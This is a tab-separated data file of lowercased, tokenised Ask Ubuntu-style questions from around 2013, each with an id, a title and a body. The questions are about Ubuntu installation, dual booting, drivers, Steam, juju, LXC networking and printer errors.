256157	error installing arduino ide on ubuntu 11.10	hi i 'm following the next lines for install arduino ide , i 'm working on ubuntu 11.10 sudo apt-get install gcc-avr avr-libc sudo apt-get install openjdk-6-jre sudo update-alternatives -- config java ( select the correct jre if you have more than one installed ) dmesg downloads page on arduino’s download page to get the latest arduino ide tarball ( .tgz file ) for the architecture . unzipped and ran it with the following command : ~/downloads $ tar xzvf arduino-1.0.1-linux64.tgz ~/downloads $ cd arduino-1.0.1 ./arduino bur when i run it i get this : virtualtouch @ ubuntu : ~/arduino-1.0.1 $ ./arduino ( java:7733 ) : gtk-warning ** : imposible encontrar el motor de temas en la ruta al _modulo : «pixmap» , ( java:7733 ) : gtk-warning ** : imposible encontrar el motor de temas en la ruta al _modulo : «pixmap» , ( java:7733 ) : gtk-warning ** : imposible encontrar el motor de temas en la ruta al _modulo : «pixmap» , ( java:7733 ) : gtk-warning ** : imposible encontrar el motor de temas en la ruta al _modulo : «pixmap» , java.lang.unsatisfiedlinkerror : /home/virtualtouch/arduino-1.0.1/lib/librxtxserial.so : /home/virtualtouch/arduino-1.0.1/lib/librxtxserial.so : clase elf errónea : elfclass64 ( possible cause : architecture word width mismatch ) thrown while loading gnu.io.rxtxcommdriver exception in thread `` main '' java.lang.unsatisfiedlinkerror : /home/virtualtouch/arduino-1.0.1/lib/librxtxserial.so : /home/virtualtouch/arduino-1.0.1/lib/librxtxserial.so : clase elf errónea : elfclass64 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary0 ( classloader.java:1750 ) at java.lang.classloader.loadlibrary ( classloader.java:1675 ) at java.lang.runtime.loadlibrary0 ( runtime.java:840 ) at java.lang.system.loadlibrary ( system.java:1047 ) at gnu.io.commportidentifier. < clinit > ( commportidentifier.java:83 ) at processing.app.editor.populateserialmenu ( editor.java:962 ) at processing.app.editor.buildtoolsmenu ( editor.java:691 ) at processing.app.editor.buildmenubar ( editor.java:476 ) at processing.app.editor. < init > ( editor.java:205 ) at processing.app.base.handleopen ( base.java:704 ) at processing.app.base.handleopen ( base.java:669 ) at processing.app.base.handlenew ( base.java:565 ) at processing.app.base. < init > ( base.java:305 ) at processing.app.base.main ( base.java:194 )
256160	login screen asking for credentials when i just booted into ubuntu for the first time off my thumb drive	ubuntu is asking for login credentials when i booted into it for the first time using a thumb drive , windows login not working .
256162	privacy option not available in 12.10 after update ?	i just updated to ubuntu 12.10 from 12.04 . after update i could not see the privacy option available in the settings menu . did i miss anything during installation ?
256165	how do i enable the grub splash screen in xubuntu 12.10 ?	i have xubuntu 12.10 running fine on a thinkpad t60 . grub2 is installed as the boot manager and the grub ... .linux_default is set as `` quiet splash '' . therefore , grub should display its splash image until plymouth takes over , as i understand it . unfortunately , it does not . if i hold down shift to get into the boot menu , my splash image shows up , but the screen remains black . i realise it 's a minor cosmetic issue , but i have found no way to fix it .
256166	installing ubuntu 12.04 on portable hard drive and still use it for storing files ?	i have seen that you can install ubuntu on a portable hard drive , but i am asking myself this question : will i be able to keep using the hard drive for personal data storage even after the install . if i 'm not mistaken , windows wo n't allow to split partitions in a hard drive ( correct me if i 'm wrong ! ) . thanks for your time and your answers ! ( sorry i 'm new to all this , trying to adapt ! )
256167	kern.log reports times in utc instead of local time zone	i attempted to set my local timezone to america/new_york by doing ( as root ) : # cp /usr/share/zoneinfo/america/new_york /etc/localtime # echo `` america/new_york '' > /etc/timezone # dpkg-reconfigure -- frontend noninteractive tzdata the `` date '' program reports the right time zone : $ date thu feb 14 16:51:28 est 2013 however , /var/log/kern.log is still reporting times in utc , e.g . : feb 14 21:38:28 newyork kernel : [ 39716989.760755 ] xvdf : unknown partition table do i need to reboot to fix this ? or is there something else i need to change ?
256172	dual monitor alignment on ubuntu 12.04	i 'm running ubuntu 12.04 on a laptop on a docking station with dual monitors ( both of them external ) set up as shown below ( where monitor 1 is primary , and where monitor 2 has been rotated 90 degrees ) . 1680x1050 1920x1080 _________ | -- > | | | | | _____________ | 2 | | -- > | | | | | | | | 1 | | | |_____________| |_________| in the illustration above , moving the pointer along the arrow in monitor 1 will cause the pointer to emerge on monitor 2 at the location depicted by the arrow in monitor 2 . thus , my desktop is being aligned at the top of both monitors . this is not what i want . i want monitor 1 to remain primary , such that the menu bar ( using gnome-session-fallback ) is located at the top of monitor 1 , but i want the bottoms of monitors 1 and 2 to be aligned . in other words , i want the set up shown below : 1680x1050 1920x1080 _________ | | | | | | _____________ | 2 | | -- > | | -- > | | | | | | 1 | | | |_____________| |_________| going to applications > system tools > system settings > displays , i see the following : an obvious apparent solution to my problem would be to simply drag the monitors in the displays settings such that they are aligned along their bottoms . however , that causes undesirable behavior . in particular , that causes the perceived area of monitor 1 to be expanded by presumably the difference between the height of monitor 1 and the height of monitor 2 ( after rotation , i.e. , as shown in my illustrations above ) . in other words , after attempting this solution , my computer thinks that my monitors are as follows : 1680x ( 1920 ? ) 1920x1080 _____________ _________ | -- > | | -- > | | | | | | | | | |_____________| | | | | | | | | | false | | | | | |_ _ _ _ _| |_________| therefore , anything that gets placed in the `` false '' region is not visible because the monitor is not truly large enough to display that region . for example , if i run conky with settings configured such that the conky display appears at the bottom-left corner of my desktop , then conky will not appear because it 's in the false region . also , if i repeatedly add items or shortcuts to my desktop , eventually an item will be placed in the false region ( since an item gets placed at a non-occupied location on the desktop by default ) . any idea how i can achieve what i want here ? ( for example , is there some way to `` bump '' the pointer by some specified number of pixels vertically when it passes from monitor 1 to monitor 2 , and vice versa ? )
256176	finding all directories with a certain string then changing permissions	i 'm trying to combine two things . i have to set permissions on a number of directories , all of which have `` domain- '' in their name . i wanted to `` find all directories in the current directory that have the string 'domain- ' in their names and change the permissions to 755 . i keep getting syntax errors and am so frustrated that i just need to ask ! thanks
256179	ubuntu is not there after installation	after a lot of trouble with the uefi-bios , my new asus 2220 , running windows 8 , accepted booting from a live-usb stick with ubuntu 12.04 on it . even better : installation of ubuntu ran without any problem . i wanted to try to make a dual-boot system , just like i had on a equally new laptop.two partitions of 160 gig were proposed and accepted . however , there is no option to choose ubuntu , the system is stubbornly sending me to windows . whatever i try , no way . i suspect that it has something to do with win8 . on the laptop i tried to do the same after doing the upgrade to win8 , but had to completely reinstall win7 . i tried to find an answer , but the combination win8 and ubuntu does not come forward . help ! where to look , how to correct this ? extra question : what does grub mean or do ? seems to be important , but i ca n't find the link . thanks a lot in advance .
256180	installing ubuntu with a dvd on a mac	i tried burning a dvd with ubuntu on it and every time i put it in my computer it says it cant read it . i do n't think it 's downloading a version for mac but i just got it from ubuntu.com . i think it may be downloading as the windows version or something because i tried burning it twice and the same thing happened both times . and i 'm using a dvd+r incase that matters and i 'm burning it with disk utility and i 'm using the speed 4x to burn it . and i 'm running os x 10.8.2 . what should i do ? and i do n't what to buy a copy of the cd from the site . also is there any reason i should n't get 12.10 instead of 12.04 ?
256181	is there an archiver for ubuntu with a gui providing multiple information during action ?	i would like one that would provide during action some more information like percentage and speed . when archives are big archiving takes a lot of time and resources , and the computer seem to lag , while this info is not displayed . so i need in such cases to see more stuff to be sure that everything is running as it should . for this purpose i use 7zip in wine at the present . is it possible to have a native application like that ?
256183	how do you install java runtime 64bit on 12.10 ?	i want the 64bit version of java to get the max performance out of minecraft . i downloaded the file from oracle but i do n't know what to do with it , or how to install it . thanks .
256187	how do i get a brother 8065dn scanner to work over network ?	i 've looked for instructions at the brother website but it seems terribly outdated . i can use it as a printer but not as a scanner in my office , but i need several machines with the ability to scan documents over the network . is there a way to get it to work as i describe ?
256190	upgrade to qemu 1,3 on ubuntu 12.10	can i upgrade qemu 1.2 to qemu 1.3 on ubuntu 12.10 ? if yes , how can i do that ? current version : kvm -version : qemu emulator version 1.2.0 ( qemu-kvm-1.2.0+noroms-0ubuntu2.12.10.2 , debian ) , copyright ( c ) 2003-2008 fabrice bellard
256192	why does it take so long for ssh to decide there was an error ?	i use ssh to log onto my server . sometimes , i leave it connected and go away from the computer , in which time the computer goes to power saving mode ( or whatever it 's called - the screen just goes black ) . when i come back and try doing anything in that terminal window , nothing appears to happen . though after at least 10 minutes it eventually says `` write failed : broken pipe '' . my question is , what 's the deal with the massive delay ? why does it take so long to decide that it can no longer connect to the server ? is there any way to reduce that time , besides just closing the terminal and starting afresh ?
256193	which settings for re-compiling libav-tools ?	which settings is ubuntu 's package libav-tools compiled with ? i want to re-compile libav-tools ( even better : the whole libav ) without adding or removing its features .
256195	another windows 8 install problem acer 21.10	i have been trying for two days to get may acer predator series g to recognize my boot dist . i have one dvd from ubuntu user which worked on my laptop and one i burned my self 12.10 64 bit which should work . reading through documintation http : //www.itwire.com/opinion-and-analysis/open-sauce/57822-ubuntu-1210-and-windows-8-an-uneasy-marriage/57822-ubuntu-1210-and-windows-8-an-uneasy-marriage ? start=1 and other sources i determined i had to turn secure boot off and try restart ( holding shift key ) or pressing f12 and getting boot options . in both cases the boot up disks are not seen . my bios setup is as follows . boot option boot priority order 1st boot device [ cd & dvd ] 2nd boot device [ removable device ] ] 3rd boot device [ hard disk : uefi : st20 ... ] authentication system boot state user secure boot mode state disabled secure boot [ disabled ] no legacy option from what i can see . so i am at a loss . could 13.04 work or am i missing something . i do n't have the windows disk .
256199	how do i reset my password ? ubuntu 12.04	i have ubuntu 12.04 , and i set my account to `` log in without a password '' . now i 'm not able to set a password , nor am i able to perform administrative actions . may i please have some help ? also , does anybody know where i can suggest to fix this problem ?
256200	windows dual boot access to other hard drives	i have a custom built pc with several internal hdds running win8 . i would like to install ubuntu alongside windows on a second partition on the c : . am i right in assuming i should be able to leave the other hard drives as they are currently , and just mount them in ubuntu , which will allow both oss to read/write them ( with ostensibly no changes in the windows side , just the files that already exist to be used by both ) ? or am i missing something ?
256202	how to upgrade qbittorrent to the latest stable ( upstream ) version ?	i currently have the 2.9.7 version of qbittorrent . i want to upgrade to the latest version , 3.0.8. sudo apt-get upgrade qbittorrent returns that the program is up-to-date : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . and install after removal do nothing but reinstall version 2.9.7 ! what am i missing ?
256206	ca n't upgrade ubuntu 12.04.2 ( i 'm on 12.04.x lts )	one weeks ago , i received 12.04.2 upgrade message from update manager . but official release was today ! and my kernel version was 3.2.x , and grub was 1.99 , etc . ( can not see difference ) but when i input /cat/issue in terminal , it says 12.04.2 lts . is there way to fully upgrade ubuntu , including grub and kernel ? thanks in advance . !
256209	will getting ubuntu on my usb stick screw up any files on my computer ?	i want to get ubuntu on my usb stick , but i do n't know too much about computers . i want to be able to put this on my usb stick , but i just want to be sure it will not mess any files up on my computer first off . i have a large number of files on here that i absolutely need . to clarify : my usb stick is empty , i 'm only worried about messing up files on my windows computer . thanks for the help !
256217	12.04 sudo testparm -s smb.conf.master > smb.conf fails on permsissions	when i run sudo testparm -s smb.conf.master > smb.conf bash : smb.conf : permission denied i just need a simple samba configuration to share files among 4 linux machines behind a router on a very small lan and am attempting to use the same configuration file for all four machines . the files are all owned by root .
256219	how do i convert chm files to pdf ?	here 's a list of things i 've tried : calibre from which i received a file containing the table of contents of the chm file with each title hyperlinked to nowhere ( i.e . they 're highlighted in blue and underlined ) . chm2pdf which gave me nothing and the errors : err011 : unable to parse html element on line 13 ! err002 : error : no pages generated ! ( did you remember to use webpage mode ? something wrong happened when launching htmldoc . exit value : 512 check if output exists or if it is good . done . archmage and then using html to pdf converters like prince , lyx and online ones . since it uses frames this appears to be tricky for such softwares . i am running 12.10 .
256220	getting black on team fotress 2 using linux version of steam	i have 12.04 64 bit installed and i am trying out steam for ubuntu . when i installed team fortress 2 and try to start it , i get a black screen with only audio you can hear . i have 4gigs of ram , intel graphics 3000 card , and icore3 cpu . i installed the new drivers from ubuntu wiki with the instruction to install steam . apparently the drivers will not install or they are listed as unknown . how do i solve my problem ?
256222	picking a partition in installer	i was installing ubuntu and i had no idea which partition was the one i created for linux . i called it linux and its a `` mac os extended ( journaled ) '' . i think thats what it 's supposed to be but i ca n't tell which partition it is . is there a way to tell or to make a show a name ? here 's a link to a picture of what is shows . and i gave it 20 gb and none of those say 20gb . i 'm on a mac with os x 10.8.2 if that helps . or can i just delete my linux partition and make it in the installer ?
256225	if i try ubuntu on a portable hard drive , will the hdd function as normal afterwards ?	i want to temporarily try ubuntu . i want to run it from my usb portable hard drive ( formatted as ntfs ) , mess around for a little , install some stuff , shutdown and remove it . however , after following how to create a bootable usb drive , when i click create , it says it will overwrite the master boot record . i imagine this could be dangerous , but since i do n't mess around with file systems often i 'm not completely sure . the portable hdd has a bunch of stuff i do n't want to lose . as far as i know , the existing partition takes up the entire drive . i want to still be able to access everything on the drive from windows afterwards . will i be able to ?
256226	juju bootstrap : `` error ssh authorized/public key not found ''	i installed ubuntu server 12.10 in a vm and tried to setup juju following these guides : https : //juju.ubuntu.com/get-started/ https : //juju.ubuntu.com/docs/getting-started.html # configuring-a-local-environment how do i configure juju for local usage ? i 'll put here the exact commands i used . sudo add-apt-repository ppa : juju/pkgs sudo apt-get update & & sudo apt-get install juju sudo apt-get install lxc apt-cacher-ng libzookeeper-java zookeeper ssh-keygen -t rsa -b 2048 juju bootstrap nano .juju/environments.yaml mkdir whatever juju bootstrap enviroments.yaml after edited : environments : sample : type : local control-bucket : juju-831d06b0c3c94d4d816f0b70c37460ea admin-secret : 353b2c52ba144dd5b22dffbf8c69c833 default-series : precise ssl-hostname-verification : true data-dir : /home/victor/whatever when i run `` juju bootstrap '' i get this error : 2013-02-14 23:05:00,846 info bootstrapping environment 'sample ' ( origin : distro type : local ) ... 2013-02-14 23:05:00,847 info checking for required packages ... 2013-02-14 23:05:01,408 error ssh authorized/public key not found . thanks for any help !
256227	problems with ubuntu on mac	i just finished downloading ubuntu on my mac and i tried to open it but it says it ca n't be opened because `` it has no mountable file systems '' . i have no idea what this means , can anyone help ?
256229	failed to download repository information | ubuntu 12.10	i already checked for a possible answer to my question , but , how to fix this since my details are different from the other people here . here 's my error information on software updater : [ w : failed to fetch http : //linux.dropbox.com/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 199.47.216.171 80 ] , w : failed to fetch http : //linux.dropbox.com/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 199.47.216.171 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . ] any advise would be great . thanks !
256239	how to bypass login screen on boot ?	i installed ubuntu to dual boot on my xp box but it would n't ever work , so i uninstalled it and am now downloading it to install as a stand-alone os on another pc . but one thing it did do that drove me insane was that it kept asking me to enter a username & password every time i ( tried to ) log on . so after i get it installed and up & running ( i hope ) is there some way to make it just go on when i push the on button without having it ask for a username & password , like xp does ?
256241	upgrade gone bad , no ubuntu , no upgrade , no windows	i have a hand me down laptop that i do n't know the windows password for . ubuntu worked fine until i allowed it to update . sadly , it got stuck for hours then shut off and when i turned it on it will not boot into the new ubuntu , the old ubuntu , or windows ( since i do n't have the password ) . should i delete everything , get a live cd , and install ubuntu again ? i tried to load ophcrack to get my windows password but it will not boot .
256243	booting ubuntu 12.04 from a usb fails on my vaio	i have already set everything up in bios to look for the usb first . however , when it tries to use the usb , the vaio symbol just keeps appearing and dissappearing . so far i have tried two different versions of ubuntu and two different usb key creators . does anyone know how i can get it to boot ? thanks .
256247	left shift key increase volume , pipe key works as shift	using a steelseries shift keyboard , my left shift key acts as a hotkey to increase volume . my pipe key now functions as left shift , meaning i have no pipe or forward slash character . xev shows : http : //pastebin.com/afghn2vh
256248	ubuntu 12.10 not recognizing android phone	i have a samsung transform ultra smartphone and i am running ubuntu 12.10. when i plug my phone in and set it to mass storage mode nothing happens on the linux end . i was under the impression that it would show up as a device somewhere , but this is n't happening lsusb shows the phone is connected bus 001 device 007 : id 04e8 : f000 samsung electronics co. , ltd and i 've tried creating a mount point for it with instructions from this forum post http : //forum.xda-developers.com/showthread.php ? t=981774 but have had no success .
256249	windows share locks up when php-fpm tries to access it	i have ubuntu desktop 12.10 running in vmware on my windows 7 machine for development purposes . the vm is set up as `` bridged '' , so effectively , it looks like it is directly connected to the same switch as my host pc . inside ubuntu , i have compiled and install php 5.4.11 and nginx 1.2.6 . php is compiled and configured to use php-fpm . i also mounted a shared folder from my host using this : //192.168.1.3/webfiles /webfiles cifs username=user , password=password , noserverino , file_mode=0777 , dir_mode=0777 0 0 this folder is then served by nginx and php-fpm . previously this has worked perfectly and is quite fast . however , yesterday , i installed software updates on my ubuntu vm since the reminder kept popping up . the vm seemed fine as i was still able to work on it with out any issues last night . this morning , i booted up the vm and was able to browse the shares in nautilus . however , once i visit a php page , the share would lock up for no reason ! nginx just shows a gateway timed out message and there was nothing relevant in the php logs . i am at lost as to how this could have happened as the setup has worked fine for many months . i would like to further investigate the root of this problem to fix it . are there any logs for the samba share on ubuntu i can inspect to do this ? has anyone had similar issues ? currently , these are all i have in the logs : log.wb-ubuntu : [ 2013/02/15 13:32:56.384600 , 0 ] winbindd/winbindd.c:212 ( winbindd_sig_term_handler ) got sig [ 15 ] terminate ( is_parent=0 ) log.winbindd : [ 2013/02/15 13:33:49.710128 , 0 ] winbindd/winbindd_cache.c:3147 ( initialize_winbindd_cache ) initialize_winbindd_cache : clearing cache and re-creating with version number 2
256252	how to revert libdrm without causing dependency issues ?	i 've been experiencing severe stability issues for the past couple days , and i 've narrowed it down to being a part of x , since everything goes back to normal for a bit when i restart lightdm . i use one of those video driver ppas that builds packages right from git , which i know is at my own risk . i 've already tried using synaptic to force a version of xserver-xorg-intel from a more stable ppa , and that did n't have much effect , but the version of libdrm currently in the repo dates from the same time as these problems began , so i imagine that 's the culprit . however , when i try to use synaptic to force a stable version of the various libdrm packages ( -intel and : i386 and so forth ) , it warns me that virtually every application in my system that depend on x will have to be removed as well . needless to say , i do n't want to have to do this . do i have a reasonable option other than waiting for the ppa ( oibaf , if anyone 's curious ) to update again ? unfortunately , i already did an apt-get clean when i thought the stability issues might be due to dpkg corruption , so i do n't have a slightly older version locally to revert to .
256257	booting from current version of kernel gives a command prompt	i keep getting a command prompt when booting into current version . i can only do a `` normal '' boot on a previous version . please help ! i am running ubuntu 12.04.2 lts i can not load ; ubuntu , with linux 3.2.0-37-generic-pae . it takes me to a command prompt . ( i just tried to download and install a newer `` experimental '' video driver , this is when it all began-after the mandatory reboot ) . i do not know command line prompt ! i can , however get ubuntu to boot ( what i consider normally ) going under `` previous linux versions '' ( i guess this is why i referred to it as a version and not a kernel . ) and use the most recent : ubuntu , with linux 3.2.0-36-generic-pae . i need help in being able to get a normal boot using 3.2.0-37-generic-pae . i will try to answer any questions that i can . what i need is to have someone walk me through what i will need to do . this is a computer shared by my family and has two accounts . it would take forever and a day to back everything up and do a fresh reinstall . when i do a `` normal '' boot , this is what happens : ubuntu 12.04.2 lts family tty1 family login : ( note : of the two accounts that i have , one is administrator and the other is the one my family uses , named family ) maybe someone out there can walk me through what i may have to do on command line prompt .
256258	suspend does n't happen when laptop lid closes - awesome wm	i 've installed awesome as my windows manager . however , it does n't seem to respect the power options from lightdm ; if i 'm at the login screen shutting the lid will trigger suspend . once i log into the awesome wm , however , this no longer happens .
256260	how to fix `` failed to download repository information '' error while updating ?	how can i fix this ? i ca n't update anything at all . i 've tried to switch to my best server in the options . when i do sudo apt-get update , this is what i get : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/release unable to find expected entry 'universe/binary-1386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . * when i do sudo apt-get upgrade , i get this : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . the contents of my source.list : deb http : //ubuntu.mirror.rafal.ca/ubuntu/ quantal universe restricted main ... .update : when i update , it looks for 'universe/binary-1386/packages' however , if i go to : ubuntu.mirror.rafal.ca/ubuntu/dists/quantal/release with google chrome , i see that the file is actually named `` universe/binary-i386/packages '' ( it 's with an i , not a 1 ) . how can i fix this and make it expect the proper package ?
256261	running opencl apps with bumblebee	i have installed cuda toolkit 5.0 and nvidia-experimental-310 drivers . cuda examples works fine with optirun but every opencl app fails to run with error calling clgetplatformids function . i 've tried examples from nvidia opencl sdk and also examples from pyopencl which i compiled from source and also using pip , nothing works . why it 's not working ?
256265	ca n't install steam from software center : `` additional software packages are missing or not installable ''	when i try to install steam on the ubuntu software center , i get this error : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
256266	uefi : bios boot windows on the hdd if i try to boot uefi ubuntu 12.10 from usb , why ?	i started by using the usb install creator form my 12.10 installation , with the 12.10 image . on my bios i disable safe boot , and enable legacy mode ( or csm a my bios calls it ) . i reboot and press the key that the bios demands to select boot device . in the list i have : p0 : windows boot manager uefi : usb my_pen_drive_brand usb : my_pen_drive_brand if i select `` uefi : usb '' it will flash the screen , and go back to the same menu ... if i select it again , it will flash the screen and boot windows . if i select `` usb '' i boot into the legacy mode for the installer just fine and everything works . but i 'm following the uefi guide and since i want to dual boot with windows8 , if i understood the guide correctly , i must install in uefi mode . so , i can select this `` usb '' and get : but the guide says i must select `` uefi : usb '' and get this : or am i messing things up ? does the fact that windows8 can boot from p0 ( when safeboot is enabled it shows `` uefi : p0 '' or something ) means i can install ubuntu in legacy mode ?
256271	how do i install steam 64-bit when package dependencies can not be resolved ?	i 'm currently running ubuntu 12.10 on wubi , and am trying to install steam . notably , when i am trying to `` buy '' steam from the store , it reads package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . opening the details shows this : the following packages have unmet dependencies : steam64 : depends : steam ( = 1.0.0.26 ) but it is not going to be installed i 've read online that i need to update ubuntu 12.10 . i have done both methods , both using software update and the manual update ( via sudo apt-get update/upgrade ) . everything 's up to date , and yet i can not install steam . any fixes ?
256272	does ubuntu have support for the apt-x codec for bluetooth audio ?	i cant find any confirmation anywhere . does anyone know ? if it is not supported , is support planned ?
256273	xmodmap changes are n't taking effect	ok . i have a thinkpad laptop and my bottom left key is a function key instead of a control key like i 'm used to . so i fired up xev , pressed the fn and got a keycode of 151 . so i cleared all of it 's current settings and ran the command : keymap -e `` keycode 151 = control_l '' it runs successfully . so then i save this to my file ~/.xmodmap . then i log in and out of my account . yet when i open firefox if i attempt to use fn + t to create a new tab the fn key is not recognized as control and nothing happens . what am i doing wrong ?
256275	command-line only version of lubuntu	so i visited the lubuntu download page ( specifically because it 's lightweight ) , which happens to be hosted in the ubuntu help section of it 's website . i tried to find a version of lubuntu similar to ubuntu server ( no gui , visible stacks ) , but i could n't find any . any feedback is appreciated .
256278	xps 13 dual boot new 1080p edition 2xusb 3.0	i just got the newest version of the xps 13 yesterday . has anyone managed to get an ubuntu/windows 8 dual boot figured out ? i tried all of the step-by-step instructions listed here : http : //ubuntuforums.org/showpost.php ? p=12486498 & postcount=10 i 've noticed that some people have had issues on the previous versions using the rhs usb 3.0 slot and had to use the usb 2.0 slot . however , both slots of this newest version are usb 3.0 ! ! i 've even tried using an external dvd drive with a live cd . using the above instructions verbatim , at best the system reboots and ignores the usb/dvd . at worst , it seems to hang and do nothing . it actually has me a little concerned that it would actually recognize a rescue usb for windows 8 ! ! where it usually hangs is when i follow the instructions : in windows 8 find the power off icon ( i.e . hit the bottom-left corner and select settings ) press it and select reboot while holding the shift key down select `` use a device '' ( again translated from it ) select `` usb storage device '' < -- - hangs , often leaving a faded screen with the options i have even tried making a usb option in the bios . the problem with that , upon the next reboot , it seems to not see the usb stick that 's still in the slot ! ! i bought this machine purely with the intention of dual-booting . it 's a beautifully awesome machine .
256280	why does unity freeze randomly ?	i 've been running ubuntu 12.04 for a while now with no problems . overall , the only kind of instability i 've had is that the system will occasionally lock up completely under prolonged full cpu usage . my current problem , though , is that unity constantly freezes . often , the whole thing does n't freeze . usually , only part of it freezes . for example , any open windows will lock up but the launcher will remain responsive , or vice-versa . i can find no abnormal resource use associated with these freezes , though . that and the fact that i can often restore responsiveness by clicking somewhere on the status bar at the top make me inclined to think that this is a bug in unity , and not , say , an issue with the graphics driver . if it 's of any use , though , i do have a pcie radeon card for which i am using the proprietary drivers , but i was able to use this for a month before i encountered this problem . another thing that i 've noticed is that the problem often manifests itself the most soon after a start-up . as soon as the system runs for a few minutes , the problem becomes significantly reduced . has anyone experienced something similar , and , of so , how did you fix it ?
256282	computer froze during ubuntu install and now computer wo n't post and no bios	a few minutes ago i was installing ubuntu 12.10 on my windows 7 machine and it froze during the installation . i waited awhile then rebooted . now the monitors never turn on and the bios never shows . it just keeps rapidly rebooting . : / i 'm not sure how this could be a hardware issue since all i was doing was installing the os . the computer was not moved at all . my motherboard is an msi z77ma-g45 with an intel i7 . thanks
256283	source code for application launcher plasmoid	can someone please show me where can i find the source code for the application launcher plasmoid ? i am unable to find it on kde base . do i have to download entire source for kde ?
256284	i 'm trying to install ubuntu on my mac on a usb drive and dont know how to do the weird terminal thing	i get messed up on step # 3 , how do i turn it into a .img file ? also would like help with rest of instructions pls
256289	which is more advisable for plex media server ? the server or desktop edition ?	i have an old hp notebook that i am going to make into a nas . it is a hp pavilion dv6000 from 2007 . specs are 1.7ghz amd athlon 64 x2 dual core processor 2.5gb ddr2 ram nvidia geforce go 6150 graphics chip . yes these specs are quite dated . it will be connected to the network via its 10/100 ethernet adapter . currently i 've got my 2tb external hard drive connected to the linksys wrt610n wireless router but i 've given up using its built in nas capability as it 's atrocious and thus want to make this notebook into a nas . this laptop will share the external hard drive to all users on the network + run a version of plex media server . that 's it , it will not be used for anything else . i know the processor is n't good enough to transcode most hd content on the fly but i 'm trying to maximize what i can get out of this machine for the next 6-9 months at which point i will probably invest into a more powerful machine . so , getting back to the question on hand : should i go with ubuntu desktop version or ubuntu server edition ? thanks , really appreciate the input .
256292	if i get ubuntu , can i still have windows 7 on my hp pavilion i5 dv6 laptop ?	like can i easily switch between windows 7 and ubuntu easily without any risk ?
256293	installed ubuntu 12.04 alongside windows7 , now win7 wants me to format drive d ?	i have an ssd boot drive and a hard disk drive , c : and d : respectively . i just installed ubuntu 12.04 alongside windows 7 and when i rebooted to go to windows , drive d says it must be formatted . is there anyway to fix this ? or will i lose all my data on that drive ?
256297	why wo n't ubuntu installed using wubi accept my password ?	i can boot into ubuntu just fine as a guest but it refuses to accept my login name and password that were set during the wubi install . i reinstalled it again with basic login and password just to make sure and it still wo n't let me in .
256299	which nvidia driver should i use ?	i 'd like to ask you a question about something in nvidia driver for my pc . i tried to install one from the nvidia website but i ended with a very low screen resolution , which is for laptops . when i open my display configuration there is a rectangle with `` laptop '' in it . what may i do ? here is a screen-shot of the drivers , which one i should install ?
256303	double-clicking on .md or .mkd or .markdown files does n't open them in retext but in the default text editor	i installed retext 3.1.3* and all suggested dependencies on lubuntu 12.10 using apt-get . if i run touch ~/desktop/abcd.md , and subsequently double-click on abcd.md in pcmanfm or on its icon on the desktop , the file opens with leafpad . the same thing happens if i use .mkd or .markdown as the extension . these extensions are among a few listed in /usr/share/mime/packages/x-retext-markdown.xml . in these three cases , when i right-click on them and look at their properties , they 're all `` plain text documents '' . if i try touch ~/desktop/abcd.rst or touch ~/desktop/abcd.rest , these files do open in retext when double-clicked . these extensions are present in /usr/share/mime/packages/x-retext-rst.xml . these files are of type `` restructuredtext document '' . the image below illustrates what i see when i right-click on files with .md , .mkd or .markdown extensions ( top left ) , or on files with .rest or .rst extensions ( top right ) . the lower image is the view pcmanfm takes of files with .mkd and .rst files . even when right-clicking and going into open with ... followed by the second open with ... shows basically the same thing . the file with a .mkd extension is seen as a `` plain text '' file whereas the one with a .rst extension is seen as a restructured text file : while it 's quite possible that i 've unintentionally tweaked something somewhere , can someone set things right for me ? just to be clear , these files are empty so their content is n't an issue : [ 11:10 am ] ~/desktop $ file abcd* abcd.markdown : empty abcd.md : empty abcd.mkd : empty abcd.rest : empty abcd.rst : empty the contents of /usr/share/applications/retext.desktop are : [ desktop entry ] version=1.0 name=retext comment=simple text editor for markdown and restructuredtext categories=office ; texteditor ; exec=/usr/bin/retext % f type=application icon=retext mimetype=text/x-retext-markdown ; text/x-retext-rst ; * retext was updated to 3.1.4 but the issue remains .
256304	public ip address for lxc container	ok , so i want to know how to do networking on lxc containers . not just the sort of vague information you get from the other websites , but a true beginner 's guide to making them work.. since most examples are basically setup for people to test with , i want to run a service on one ... like a web server for example . i am running ubuntu 12.04 lts and i have lxc installed and i can make , start and stop a container . my server obviously has a public facing ip and i would like to know how to setup a container so it too can have a public ip . since there already seems to be a bridge in place from my current container it would seem that i either need to give the containers a dhcp range that is public for them to work off or manually assign a static ip address to my container . if i want to statically assign an ip to the container , how do i do that ? do i need to make any changes to my bridge config on the host ? is it actually better to do it with the macvlan option ? any help would be appreciated .
256308	vi - insert mode does n't work in ubuntu 12.10	i am working on ubuntu 12.10 , and my insert mode in vi is n't working . when i hit i to go insert mode , nothing happens . on hitting i again writes i on terminal , but < -backspace does n't remove the character . only delete works there . do i need to configure anywhere ?
256310	ubuntu server to support unlimited or 100+ telnet users	i am new to ubuntu . i have installed ubuntu server 12.10 and i want it to support unlimited or 100+ telnet instances or sessions . how shall i go about it . regards rohan
256315	xerox work center jcl syntax error/ printing error ( 016-749 )	its long since xerox workcenter 5225 is not working with my ubuntu 32 bit . the new error i am receiving is that says jcl syntax error . still gnome in ubuntu tells me printing is successful but it actually gives error . such things have been reported on mac as well . when i looked through trouble shooting manual this error code ( 016-749 ) says code ( 016-749 ) cause - a jcl command syntax error occurred remedy- confirm the print settings , or correct the jcl command . how to correct jcl command ? i know nothing about it .
